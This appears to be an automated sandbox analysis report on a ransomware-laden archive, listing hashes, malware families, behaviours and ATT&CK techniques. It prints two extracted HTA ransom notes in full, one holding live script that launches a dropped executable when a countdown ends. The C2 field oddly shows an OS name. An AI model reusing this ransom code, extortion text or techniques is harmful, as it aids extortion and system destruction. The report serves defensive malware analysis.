Resubmissions

12-06-2024 08:28

240612-kcy2jawckj 10

10-06-2024 17:27

240610-v1ktxsvbpk 10

General

  • Target

    Mydooms.zip

  • Size

    7.3MB

  • Sample

    240612-kcy2jawckj

  • MD5

    d9bbe9314e8114fa2cc00422b09fdd9d

  • SHA1

    a138d7a8c054d8dd9904f6fb378d51af02385a52

  • SHA256

    dbcc1bec2dbc4002cfdade40966eb639ccf4da67a7b9728f444beb1d35ed4f7f

  • SHA512

    79c96afd2bedb2ed22027cd135678db411fedeba92e481d2e410eb516cb26d8c8aebf3d63ed8941a91f70dee75a5fa2dfdff8c2bec07c205ac33710f2dff635f

  • SSDEEP

    196608:RyiXnVyuWadlIK+eU3hW0y9PnO+K8Lsi2L:AiXnVyuWaP6eahWPNPt2L

Malware Config

Extracted

Family

zebrocy

C2

Windows XP Professional x64 Edition

Extracted

Path

C:\ProgramData\Adobe\# SATAN CRYPTOR #.hta

Ransom Note

<html> <head> <title>SATAN CRYPTOR</title> <HTA:APPLICATION ID="" APPLICATIONNAME="" BORDER="DIALOG" MAXIMIZEBUTTON="NO" SCROLLFLAT="YES" CAPTION="YES" SELECTION="NO" INNERBORDER="NO" ICON="" SCROLL="NO" SHOWINTASKBAR="YES" SINGLEINSTANCE="YES" SYSMENU="YES" WINDOWSTATE="NORMAL" /> </head> <script language=javascript> var winWidth = 800; var winHeight = 600; window.resizeTo(winWidth, winHeight); window.moveTo(screen.width/2-winWidth/2, screen.height/2-winHeight/2); </script> <body bgcolor=buttonface text=buttontext style="font: 10pt 'Tahoma'"> <div style="font-weight:bold; font:16pt; text-align: center" id="Tittle">Attention!</div> <br> <div style="padding:15px" id="SubTittle"> Your documents, photos, databases and other important files have been encrypted cryptographically strong, without the cipher key recovery is impossible! <br> <br> To decrypt your files you need to buy the special software - <strong>SATAN DECRYPTOR</strong> and your <strong>Private Decryption Key</strong>. <br> <br> Using another tools could corrupt your files, in case of using third party software we dont give guarantees that full recovery is possible so use it on your own risk. <br> <br> If you want to restore files, write us to the our e-mail: <strong>[email protected]</strong> <br> <br> Please write your <strong>Personal Identification Code</strong> in body of your message. <br> <br> Also attach to email 3 encrypted files for free decryption test. (each file have to be less than 1 MB size and not have valuable content) <br> <br> It is in your interest to respond as soon as possible to ensure the restoration of your files! <br> <br> Your <strong>Personal Identification Code</strong>: </div> <center> <textarea style="overflow:auto; font:10pt 'Tahoma'" name="TextArea" rows=10 cols=120 readonly></textarea> </center> </body>
Emails

<strong>[email protected]</strong>

Extracted

Path

C:\Users\Admin\Desktop\New folder\Mydoom\Mydoom Ransomwares\info.hta

Ransom Note

<html> <head> <title>Loki locker</title> <HTA:APPLICATION ICON='msiexec.exe' WINDOWSTATE="maximize" SINGLEINSTANCE='yes' SysMenu="no" contextmenu="no" scroll="yes"/> <meta http-equiv="x-ua-compatible" content="IE=9"/> </head> <style type="text/css"> body{background-color: #000000; font-family: Arial, Helvetica, sans-serif;}#t{text-align: center; color: #FF0000; font-weight: bold; font-size: 1.51vw; margin-bottom: 0;}p{text-align: center; font-size: 1vw; color: white; margin-bottom: 0;}.t{text-align: left; margin-left: 2px;}.pt{color: white; font-weight: bold; text-indent: 10px; height: 30px; line-height: 30px; padding-top: 10px; font-size: 1.1vw;}.b{padding: 2px; outline: none;}ul{font-size: 1vw;}.m{background: rgb(189, 54, 54); padding: 1px 5px; font-weight: bold;}#tm{color: red; text-align: center; border-bottom: 0; font-size: 2vw;}</style> <script>var countDownDate = new Date(2024,6,12,8,30,43).getTime(); var x = setInterval(function () { var now = new Date().getTime(); var distance = countDownDate - now; var days = Math.floor(distance / (1000 * 60 * 60 * 24)); var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60)); var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60)); var seconds = Math.floor((distance % (1000 * 60)) / 1000); document.getElementById("tm").innerHTML = days + "d," + hours + ":" + minutes + ":" + seconds + " LEFT TO LOSE ALL OF YOUR FILES"; if (distance < 0) { clearInterval(x); document.getElementById("tm").innerHTML = "TIMER IS UP.SAY BYE TO YOUR FILES :)"; WshShell = new ActiveXObject("WScript.Shell"); WshShell.Run("C:\\ProgramData\\winlogon.exe", 1, false);}}, 1000); </script> <body > <h1 id="t">All your files have been encrypted by Loki locker!</h1> <h2 id="tm"></h2> <p>All your files have been encrypted due to a security problem with your PC. <br>If you want to restore them, please send an email <span class="m">[email protected]</span> </p><br><p class="t"> You have to pay for decryption in Bitcoin. 
The price depends on how fast you contact us. <br>After payment we will send you the decryption tool. <br>You have to 48 hours(2 Days) To contact or paying us After that, you have to Pay <b>Double</b>. <br>In case of no answer in 24 hours (1 Day) write to this email <span class="m">[email protected]</span> <br>Your unique ID is : <span class="m">DE44B1C0</span> </p><br><div class="b" style="background-color: #FF0000;"> <div class="pt">You only have LIMITED time to get back your files!</div><ul style="color: white; margin-top: 0;"> <li>If timer runs out and you dont pay us , all of files will be DELETED and you hard disk will be seriously DAMAGED.</li><li>You will lose some of your data on day 2 in the timer.</li><li>You can buy more time for pay. Just email us.</li><li>THIS IS NOT A JOKE! you can wait for the timer to run out ,and watch deletion of your files :) </li></ul> </div><br><div class="b" style="background-color: rgb(78, 78, 78);"> <div class="pt">What is our decryption guarantee?</div><ul style="color: white; margin-top: 0;"> <li>Before paying you can send us up to <u>3 test files</u> for free decryption. The total size of files must be less than 2Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)</li></div><br><div class="b" style="background-color: #FF0000;"> <div class="pt">Attention!</div><ul style="color: white; margin-top: 0;"> <li><u><b>DO NOT</b> pay any money before decrypting the test files.</u></li><li><u><b>DO NOT</b> trust any intermediary.</u> they wont help you and you may be victim of scam. 
just email us , we help you in any steps.</li><li><u><b>DO NOT</b> reply to other emails.</u> ONLY this two emails can help you.</li><li>Do not rename encrypted files.</li><li>Do not try to decrypt your data using third party software, it may cause permanent data loss.</li><li>Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.</li></ul> </div></body> </html>
Emails

[email protected]

[email protected]

URLs

http-equiv="x-ua-compatible"

Targets

    • Target

      Mydooms.zip

    • Size

      7.3MB

    • MD5

      d9bbe9314e8114fa2cc00422b09fdd9d

    • SHA1

      a138d7a8c054d8dd9904f6fb378d51af02385a52

    • SHA256

      dbcc1bec2dbc4002cfdade40966eb639ccf4da67a7b9728f444beb1d35ed4f7f

    • SHA512

      79c96afd2bedb2ed22027cd135678db411fedeba92e481d2e410eb516cb26d8c8aebf3d63ed8941a91f70dee75a5fa2dfdff8c2bec07c205ac33710f2dff635f

    • SSDEEP

      196608:RyiXnVyuWadlIK+eU3hW0y9PnO+K8Lsi2L:AiXnVyuWaP6eahWPNPt2L

    • DcRat

      DarkCrystal (DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    • Dharma

      Dharma is a ransomware that uses security software installation to hide malicious activities.

    • Disables service(s)

    • Modifies Windows Defender Real-time Protection settings

    • SatanCryptor

      Golang ransomware first seen in early 2020.

    • Zebrocy

      Zebrocy is a backdoor created by Sofacy threat group and has multiple variants developed in different languages.

    • Zebrocy Go Variant

    • DCRat payload

      Detects payload of DCRat, commonly dropped by NSIS installers.

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Renames multiple (262) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Disables Task Manager via registry modification

    • Drops file in Drivers directory

    • Modifies Windows Firewall

    • Sets DLL path for service in the registry

    • ACProtect 1.3x - 1.4x DLL software

      Detects file using ACProtect software.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Drops startup file

    • Executes dropped EXE

    • Loads dropped DLL

    • Modifies file permissions

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Adds Run key to start application

    • Drops desktop.ini file(s)

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Maps connected drives based on registry

      Disk information is often read in order to detect sandboxing environments.

    • Modifies WinLogon

    • Writes to the Master Boot Record (MBR)

      Bootkits write to the MBR to gain persistence at a level below the operating system.

    • Drops file in System32 directory

    • Sets desktop wallpaper using registry

    • Suspicious use of NtSetInformationThreadHideFromDebugger

    • Suspicious use of SetThreadContext

MITRE ATT&CK Matrix ATT&CK v13

Execution

    • System Services (T1569): 1
        • Service Execution (T1569.002): 1
    • Windows Management Instrumentation (T1047): 1
    • Scheduled Task/Job (T1053): 1
    • Command and Scripting Interpreter (T1059): 1

Persistence

    • Create or Modify System Process (T1543): 3
        • Windows Service (T1543.003): 3
    • Boot or Logon Autostart Execution (T1547): 3
        • Registry Run Keys / Startup Folder (T1547.001): 2
        • Winlogon Helper DLL (T1547.004): 1
    • Pre-OS Boot (T1542): 1
        • Bootkit (T1542.003): 1
    • Scheduled Task/Job (T1053): 1

Privilege Escalation

    • Create or Modify System Process (T1543): 3
        • Windows Service (T1543.003): 3
    • Boot or Logon Autostart Execution (T1547): 3
        • Registry Run Keys / Startup Folder (T1547.001): 2
        • Winlogon Helper DLL (T1547.004): 1
    • Scheduled Task/Job (T1053): 1

Defense Evasion

    • Modify Registry (T1112): 7
    • Impair Defenses (T1562): 2
        • Disable or Modify Tools (T1562.001): 1
        • Disable or Modify System Firewall (T1562.004): 1
    • Indicator Removal (T1070): 2
        • File Deletion (T1070.004): 2
    • File and Directory Permissions Modification (T1222): 1
    • Pre-OS Boot (T1542): 1
        • Bootkit (T1542.003): 1

Credential Access

    • Unsecured Credentials (T1552): 1
        • Credentials In Files (T1552.001): 1

Discovery

    • Query Registry (T1012): 7
    • System Information Discovery (T1082): 8
    • Peripheral Device Discovery (T1120): 3
    • Remote System Discovery (T1018): 1

Collection

    • Data from Local System (T1005): 1

Impact

    • Service Stop (T1489): 1
    • Inhibit System Recovery (T1490): 2
    • Defacement (T1491): 1

Tasks